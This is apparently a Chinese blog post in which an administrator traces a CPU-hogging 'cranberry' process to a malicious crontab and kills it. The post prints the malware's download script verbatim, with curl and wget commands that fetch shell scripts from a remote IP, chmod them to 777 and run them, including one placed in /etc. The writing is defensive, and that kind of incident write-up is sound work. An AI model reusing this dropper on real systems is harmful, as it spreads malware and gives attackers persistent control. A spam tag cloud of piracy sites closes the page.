记录徒手解决cranberry病毒的过程推荐

Home » 编程开发 » 记录徒手解决cranberry病毒的过程推荐

今天中午测试反馈说线上系统频繁的报502错误,并且响应极慢。开始怀疑是公司哪位小哥在下载小电影,但打开其他网站都很快。于是继续怀疑难道是业务激增导致带宽被占满了,于是登录监控界面,显示只用了80Mb,带宽也没占满。

发现根本原因

ssh上服务器之后,本能的执行top命令,返现cranberry进程几乎把cpu吃满了。

于是尝试kill掉进程

kill -9 14465

kill掉之后,cranberry又会立即自动重启。在紧盯屏幕之后,惊喜的发现crontab进程。于是大喜过望,这哥们会啊。crontab命令教程于是查看crontab的列表

crontab -l

看到如下命令,会通过定时任务去远程服务器下载脚本。 于是把crontab的列表删掉

crontab -r

然后,以为kill掉cranberry之后,就ok了,谁知道还是自动重启。那只能耐着性子,把脚本下载下来研究一下了,脚本内容如下:

#!/bin/bashSHELL=/bin/shPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/binpkill -f jIuc2ggfCAvYmluL2Jhc2gipkill -f lowerv2.shpkill -f rootv2.shpkill -f sourplumpkill -f nativesvcps aux | awk '{if($3 20.0) print $2}' | while read procidkill -9 $procidwhoami=$( whoami )if [ ${whoami}x != "root"x ];then curl http://172.96.252.86/lowerv3.sh /tmp/lower.sh if [ ! -f "/tmp/lower.sh" ] ;then wget -P /tmp/ http://172.96.252.86/lowerv3.sh rm /tmp/lower.sh.* chmod 777 /tmp/lower.sh bash /tmp/lower.sh curl http://172.96.252.86/rootv3.sh /etc/root.sh if [ ! -f "/etc/root.sh" ] ;then wget -O /etc/root.sh http://172.96.252.86/rootv3.sh chmod 777 /etc/root.sh bash /etc/root.shecho "over"

这脚本倒也简单,主要是下载另外一个脚本,到/etc/目录中,名字是root.sh.于是查看是哪个进程执行了脚本:

root@SSP001:[/proc]ps -ef|grep root.shroot 1541 28244 0 16:19 pts/1 00:00:00 grep root.shroot 2036 1653 0 11:00 ? 00:00:57 bash /etc/root.shroot 2080 1544 0 06:00 ? 00:01:21 bash /etc/root.shroot 6035 5979 0 Jan15 ? 00:13:01 bash /etc/root.shroot 8659 8156 0 05:00 ? 00:01:24 bash /etc/root.shroot 9649 9627 0 Jan15 ? 00:07:03 bash /etc/root.shroot 9979 9731 0 02:00 ? 00:03:12 bash /etc/root.shroot 11925 11497 0 14:00 ? 00:00:16 bash /etc/root.shroot 14874 14437 0 Jan15 ? 00:08:55 bash /etc/root.shroot 14931 14794 0 Jan15 ? 00:12:22 bash /etc/root.shroot 14935 13330 0 15:00 ? 00:00:00 bash /etc/root.shroot 15050 14391 0 12:00 ? 00:00:32 bash /etc/root.shroot 15596 15349 0 Jan15 ? 00:03:46 bash /etc/root.sh

把上边的进程kill掉:

kill -9 2036 2080 6035 8659 9649 9979 11925 14874 14931 14935 15050 15596 16459 17199 19983 20478 20795 21609 21810 23402 24943 25513 27988 28883 29853 31304 31499 32364

然后再kill掉cranberry:

killall -9 cranberry

于是cpu恢复到了正常水平。

cranberry病毒的原理通过定时去远程下载脚本通过脚本,执行守护任务,发现cranberry被kill之后,立即通过crontab启动。只有经历过地狱般的折磨,才有征服天堂的力量。

记录徒手解决cranberry病毒的过程推荐

相关文章:

你感兴趣的文章:

标签云:

亚洲高清电影在线, 免费高清电影, 八戒影院夜间, 八戒电影最新大片, 出轨在线电影, 午夜电影院, 在线影院a1166, 在线电影院, 在线观看美剧下载, 日本爱情电影, 日韩高清电影在线, 电影天堂网, 直播盒子app, 聚合直播, 高清美剧, 高清美剧在线观看 EhViewer-E站, E站, E站绿色版, qqmulu.com, qq目录网, qq网站目录,